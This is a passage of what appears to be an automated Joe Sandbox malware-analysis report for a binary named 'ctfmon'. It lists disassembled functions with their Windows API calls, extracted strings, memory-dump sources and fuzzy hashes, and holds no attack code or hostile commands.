GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE88
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEA6
FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEDB
MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,0040D0BE,?,00000000,?,?,?,0040D0BE), ref: 0040FF0B
FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FF41

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
Instruction ID: aa68c8225dd583959b6512c48fc187da00978e995f8350bfac9d4924fef5e386
Opcode Fuzzy Hash: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
Instruction Fuzzy Hash: 60413632A042126BD731AB64EC44B3B7698EB51714F11053BF801F3BE2DB7C9C4946D8

Function 0041DA90 Relevance: 13.6, APIs: 9, Instructions: 128threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041DA97
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041DAA4
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DAEC
CallNextHookEx.USER32(00000000,?,?,?), ref: 0041DB03
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DB1E
GetWindowLongA.USER32(?,000000F0), ref: 0041DB62
SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 0041DB89
GetParent.USER32(?), ref: 0041DBF1
CallNextHookEx.USER32(?,?,?,?), ref: 0041DC2E

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
String ID:
API String ID: 1151315845-0
Opcode ID: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
Instruction ID: 3545cc89381b001688f13769ec11b2821f14b273c618948fc64cceaa8c3ba814
Opcode Fuzzy Hash: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
Instruction Fuzzy Hash: 9C41DAB5A44310EBD720DF10EC85BEB7764FB59358F14042AFA0593292D778A8CDC7A9

Function 0041D4B0 Relevance: 13.6, APIs: 9, Instructions: 54COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D4B6
GlobalDeleteAtom.KERNEL32(?), ref: 0041D4F2
GlobalDeleteAtom.KERNEL32(?), ref: 0041D50D
GlobalDeleteAtom.KERNEL32(?), ref: 0041D520
GlobalDeleteAtom.KERNEL32(?), ref: 0041D533
GlobalDeleteAtom.KERNEL32(?), ref: 0041D546
GlobalDeleteAtom.KERNEL32(?), ref: 0041D559
GlobalDeleteAtom.KERNEL32(?), ref: 0041D56C
LeaveCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D57D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
String ID:
API String ID: 3843206905-0
Opcode ID: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
Instruction ID: 13cd0210057b9161806c39b4b786d17877643f6b89466e3cfc64d8f8ea033297
Opcode Fuzzy Hash: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
Instruction Fuzzy Hash: 40113DBDC00215B1D7356BA4EC086EA36B5A71A70CF246422E600476F0D7BC58CEDFAC

Function 00416C3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,?,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C7E
GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C98
GetStringTypeA.KERNEL32(?,?,?,?,qhA,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416CCC
MultiByteToWideChar.KERNEL32(?,0053FD89,?,?,00000000,00000000,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416D04
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C

Strings

qhA, xrefs: 00416D64, 00416CBF

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: qhA
API String ID: 3852931651-109923292
Opcode ID: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
Instruction ID: 03fcf75f4968f94f2bb644bc32e47f6b93cad4a4674484b923943e54a38a0d42
Opcode Fuzzy Hash: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
Instruction Fuzzy Hash: 0641AD72A00219AFCF219F94EC86EEF7BB8FB08754F214526F911D2250D338C991DBA5

Function 00410561 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004105CE
GetStdHandle.KERNEL32(000000F4,0042F07C,00000000,00000000,00000000,?), ref: 004106A4
WriteFile.KERNEL32(00000000), ref: 004106AB

Strings

Microsoft Visual C++ Runtime Library, xrefs: 0041067A
..., xrefs: 00410620
Runtime Error!Program: , xrefs: 00410634
<program name unknown>, xrefs: 004105DE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
Instruction ID: c02292fbb0e4d8d3e6b59c55069bed7ebd2c7da6c3cacf8f517a257bbcbb3b0a
Opcode Fuzzy Hash: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
Instruction Fuzzy Hash: 6031D672B00218AEDF20DAA0CD45FDE376DDF85304F90046BF544D6191E6F8AAD58A5D

Function 00406D3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406D42
GetStockObject.GDI32(00000011), ref: 00406D75
GetStockObject.GDI32(0000000D), ref: 00406D80
GetObjectW.GDI32(00406E87,0000005C,?), ref: 00406DAE
GetDeviceCaps.GDI32(?,0000005A), ref: 00406E1D
#253.OLEPRO32(00000020,0042F580,?,?), ref: 00406E49

Strings

, xrefs: 00406DBA

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Object$Stock$#253CapsDeviceH_prolog
String ID:
API String ID: 1238440774-3916222277
Opcode ID: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
Instruction ID: ff0ac20cef680e3f131b4560153c210be97b3ea0a685f7a4baa30aa74b484bf8
Opcode Fuzzy Hash: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
Instruction Fuzzy Hash: C2414974E012299ECB10DFA5D9807EDBBB0BF18304F5040BAE555F7281E7785A45CFA8

Function 00405C06 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 00405C1D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C44
GetSystemMetrics.USER32(00000000), ref: 00405C5C
GetSystemMetrics.USER32(00000001), ref: 00405C63
lstrcpyW.KERNEL32(?,DISPLAY), ref: 00405C87

Strings

DISPLAY, xrefs: 00405C81
B, xrefs: 00405C25

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: System$InfoMetrics$MonitorParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1771318095-3316187204
Opcode ID: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
Instruction ID: 930622f50884a770117930609482ab71e3439554aa9ec88adfacdbd60153f98a
Opcode Fuzzy Hash: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
Instruction Fuzzy Hash: D611E031600B20ABEF119F64DC89A9BBBA8EF09B50B044473FC05AE181D3B5D941CFE9

Function 00407CA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407CAA

Part of subcall function 00407A77: CoGetClassObject.OLE32(00000000,?,00000000,0042F6B0,00000003,?,?,?,?,00407CD3,?,00000000,00000003,0042F710,?,?), ref: 00407A97

Part of subcall function 00426B33: __EH_prolog.LIBCMT ref: 00426B38

Part of subcall function 00426C0F: __EH_prolog.LIBCMT ref: 00426C14

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00407E30
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00407E51
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00407E99
GlobalLock.KERNEL32(00000000), ref: 00407EA7
GlobalUnlock.KERNEL32(?), ref: 00407EBF
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00407EE2
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 00407EFE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
Instruction ID: 7a88ba2808e2917381c35da6fa48b70894891fb86309c958b2177dbe66a41b7c
Opcode Fuzzy Hash: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
Instruction Fuzzy Hash: 9BB1F7B0A0020AEFCB14DF64C8849AE7BB9FF48304B50446EF915EB290D775ED55CBA5

Function 00414114 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 00414156
LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000), ref: 00414172
LCMapStringW.KERNEL32(00000000,?,004070FB,00000001,004070FB,004070FB,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 004141BB
WideCharToMultiByte.KERNEL32(00000000,00000220,004070FB,00000001,00000000,00000000,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?), ref: 004141EE
WideCharToMultiByte.KERNEL32(00000220,00000220,?,?,?,?,00000000,00000000), ref: 00414245
LCMapStringA.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00414261
LCMapStringA.KERNEL32(00000000,?,?,?,?,00000000), ref: 004142B7

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
Instruction ID: 4b50a8c487744f979af65fd3580d31e16f27d9c7471aa09ca8c7b8346b332458
Opcode Fuzzy Hash: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
Instruction Fuzzy Hash: E8516072A01219FBCF218F95DC45AEF7F75FF49790F104126F914A2260D33988A1DBA9

Function 00420312 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 00420332
lstrcmpW.KERNEL32(00000000,?), ref: 0042033F
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00420351
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00420374
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042037C
GlobalLock.KERNEL32(00000000), ref: 00420389
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00420396
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004203B4

Part of subcall function 00426AAB: GlobalFlags.KERNEL32(?), ref: 00426AB5
Part of subcall function 00426AAB: GlobalUnlock.KERNEL32(?), ref: 00426ACC
Part of subcall function 00426AAB: GlobalFree.KERNEL32(?), ref: 00426AD7

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
Instruction ID: 0b204c46f73b846c4d535605207009b96763e7d5aecbe2a14173c396f1b1e3a3
Opcode Fuzzy Hash: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
Instruction Fuzzy Hash: B811B271600204BFDB219FA6DC85EAF7BBEEB85744F80441FF605C1122DA389D419768

Function 004036E0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00403744
SetCurrentDirectoryW.KERNEL32(?), ref: 00403758

Part of subcall function 00405FAB: lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
Part of subcall function 00405FAB: FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
Part of subcall function 00405FAB: GetLastError.KERNEL32 ref: 00405FF1
Part of subcall function 00405FAB: SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C

SetCurrentDirectoryW.KERNEL32(?,*.*,00000000), ref: 00403772
SetCurrentDirectoryW.KERNEL32(?,?,*.*,00000000,?), ref: 004039B8

Strings

+*&=^^^^--------FOAFI, xrefs: 004037FA
*.*, xrefs: 0040375B, 004037EB

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentDirectory$ErrorLast$FileFindFirstlstrcpy
String ID: *.*$+*&=^^^^--------FOAFI
API String ID: 3265023940-3701103783
Opcode ID: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
Instruction ID: c2ba0176b6e8a51bde1fead6c9d730875980fedec447b924fc6af5e119b7eb36
Opcode Fuzzy Hash: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
Instruction Fuzzy Hash: 5C91B2B16087458FC714EF64D881AAFB7E4FF94304F40492EF88697292DB789A09CB56

Function 0042A3D2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 204stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A3D7
lstrlenA.KERNEL32(?,?,00000000), ref: 0042A402

Part of subcall function 0042A1BB: VariantChangeType.OLEAUT32(?,?,00000000), ref: 0042A25D

VariantClear.OLEAUT32(0000000C), ref: 0042A536

Strings

`DvP?Dv, xrefs: 0042A611

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Variant$ChangeClearH_prologTypelstrlen
String ID: `DvP?Dv
API String ID: 1986235341-2995021381
Opcode ID: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
Instruction ID: abb0e72d5d88a092ec7afbcfa9dfacffd580bca7bb0b75038710df2ecb83c9b3
Opcode Fuzzy Hash: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
Instruction Fuzzy Hash: 2571DF31A00219EBCB10DF95E884AAF7BB4FF04354B94801AFC45AB351D738DD65CB9A

Function 0041F591 Relevance: 10.6, APIs: 7, Instructions: 140COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041F5E3
CallWindowProcA.USER32(00000000), ref: 0041F605

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
Instruction ID: 95218b5de41767b7d9650821bd78bf42db176b432e658d53fc5444424646f800
Opcode Fuzzy Hash: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
Instruction Fuzzy Hash: 263121B66012106BD31097A8AC85DEFB79CDBD6365F04003AF904C3211E339A98B87BA

Function 0041C550 Relevance: 10.6, APIs: 7, Instructions: 109COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?), ref: 0041C56D
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
SetBkColor.GDI32(?,?), ref: 0041C607
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
SetBkColor.GDI32(?,00000000), ref: 0041C674

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Text$Color
String ID:
API String ID: 3751486306-0
Opcode ID: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
Instruction ID: dabda8f32d19d4ae70fa47c5b4f3ddd5b41a6e56053b92537af6c747e390af38
Opcode Fuzzy Hash: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
Instruction Fuzzy Hash: EE415A74244301AFE320DF54CC86F6AB7E4EB85B40F64481DFA549A2C1D775E90ACB6A

Function 0040C2A5 Relevance: 10.6, APIs: 7, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000002), ref: 0040C2C0
GetParent.USER32(?), ref: 0040C2D3

Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000F0), ref: 0040C264
Part of subcall function 0040C24C: GetParent.USER32(?), ref: 0040C27D
Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000EC), ref: 0040C290

